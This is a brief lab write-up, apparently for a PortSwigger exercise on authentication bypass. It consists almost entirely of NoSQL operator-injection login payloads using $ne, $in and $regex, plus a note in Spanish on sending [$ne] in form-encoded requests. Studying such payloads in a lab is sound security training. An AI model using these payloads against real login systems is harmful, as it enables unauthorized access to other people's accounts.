2 - Exploiting NoSQL operator injection to bypass authentication
#nosqli #authentication #portswigger #writeup
json
{"username":"administrator","password":{"$ne" :"peter"}}json
{"username":{"$in":["admin","administrator","superadmin"]},"password":{"$ne":""}}Cambiar a form urlencoded y probar con [$ne].
json
{"$regex":"wien.*"}
{"$regex":"admin.*"}